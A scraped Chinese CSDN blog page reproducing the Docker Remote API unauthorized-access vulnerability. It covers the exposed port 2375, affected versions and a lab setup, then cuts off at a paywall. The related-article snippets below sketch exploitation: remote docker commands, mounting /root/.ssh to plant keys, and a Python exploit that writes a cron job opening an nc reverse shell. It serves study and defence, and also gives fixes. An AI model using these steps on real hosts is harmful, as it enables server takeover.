DOCKER REMeOTE API 未授权访问漏洞复现

最新推荐文章于 2024-07-06 09:07:26 发布
最新推荐文章于 2024-07-06 09:07:26 发布
阅读量716 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43061533/article/details/110451260
版权
本文详细介绍了Docker Remote API存在的未授权访问漏洞,该漏洞允许任意IP访问,影响Docker 19.03.12之前的版本。通过cURL验证了漏洞,并提供了环境搭建、漏洞利用的步骤。修复建议包括更改端口号、限制IP访问及启用TLS认证。
摘要由CSDN通过智能技术生成

0x01 漏洞简述

Docker Remote API是一个取代远程命令行界面(rcli)的REST API。本文中,我们将使用命令行工具cURL来处理url相关操作。cURL可以发送请求、获取以及发送数据、检索信息。

0x02 风险等级

严漏洞的评定结果如下:
评定方式 等级
威胁等级 严重
影响面 广泛

0x03 漏洞详情

Docker的docker.service设置为0.0.0.0/lib/systemd/system/docker.service,导致任意访问
Docker没有使用iptables等限制可连接的来源ip.

0x04 影响版本

Docker version 19.03.12 之前版本

0x05 漏洞验证

安装环境
靶机环境:Ubantu 20.04 172.16.16.212 Docker 17.03
攻击机环境:Ubantu 12.04 172.16.16.254 Docker 17.03

环境搭建

  1. sudo apt-get install docker-ce=17.03.1ce0~ubantu-xenial #安装docker环境
    在这里插入图片描述

  2. 修改/lib/systemd/system/docker.service文件中的dockerd启动参数,使其绑定在0.0.0.0上

最低0.47元/天 解锁文章
coc.
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker remote API 漏洞复现
顶峰
04-03 370
引用网上的一些总结流程1. Docker是以root权限运行的,这是所有姿势的前提1.Docker在运行一个容器的时候可以将宿主机上的一个目录挂载到容器内的一个目录,我们可以参考redis授权访问漏洞,将宿主机的/root/.ssh目录挂载到容器上,然后写入公钥。如果有web目录的话,最差也能上一个webshell。1.
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
授权访问Docker授权访问漏洞
qq_68163788的博客
05-14 2195
Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。开发者在笔记本上编译测试通过的容器可以批量地在生产环境中部署包括 VMs、bare metal、OpenStack 集群和其他的基础应用平台DockerDocker Remote API 是一个取代远程命令行界面(rcli)的REST API。 存在问题的版本分别为 1.3 和 1.6因为权限控制等问题导致可以通过 docker client 或者 http 直接请求就可以访问这个 API
云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸
最新发布
qq_53058639的博客
07-06 921
1、云原生-Docker安全-容器逃逸&内核漏洞2、云原生-Docker安全-容器逃逸&版本漏洞3、云原生-Docker安全-容器逃逸&CDK自动化。
关于docker remote api授权访问漏洞的学习与研究
07-16 624
漏洞介绍: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerdocker swarm是docker下的分布化应用的本地集群,在开放2375监听集群容器时,会调用这个api url输入ip:2375/version就会列出基本信息,和docker vers...
Docker Remote Api授权访问漏洞
Seth为理想奋斗
06-17 3078
一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 3, 没有使用iptables等限制可连接的来源ip二. 漏洞利用1.远程对被攻击的主机的docker容器进行操作docker -H tcp://remoteip:2375 images 远程启动被攻击主机的docker
漏洞——Docker远程api授权访问(原理扫描)
龍承leo
10-24 843
Docker远程api授权访问(原理扫描)
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2299
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker授权访问漏洞
qq_50854662的博客
10-18 1394
Docker授权访问漏洞
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7829
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker授权访问漏洞(www.hetianlab.com)
懂进攻知防守
07-20 3258
Docker是一个开源的引擎,可以轻松的为任何应用创建一个轻量级的、可移植的、自给自足的容器。Docker Daemon把服务暴露在tcp的2375端口上,这样就可以在网络上操作Docker了。Docker本身没有身份认证的功能,只要网络上能访问到服务端口,就可以操作Docker。...
docker remote api授权访问_【超详细】Redis 授权访问漏洞
weixin_39747568的博客
11-26 300
0x01 漏洞描述  Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用...
docker daemon api 授权访问漏洞
EC_Carrot的博客
05-26 204
漏洞复现 利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。 利用EXP: import docker client = docker.DockerClient(base_url='http://attack-ip:2375/') data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc yo
Docker授权访问漏洞详解
m0_64481831的博客
06-11 1314
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值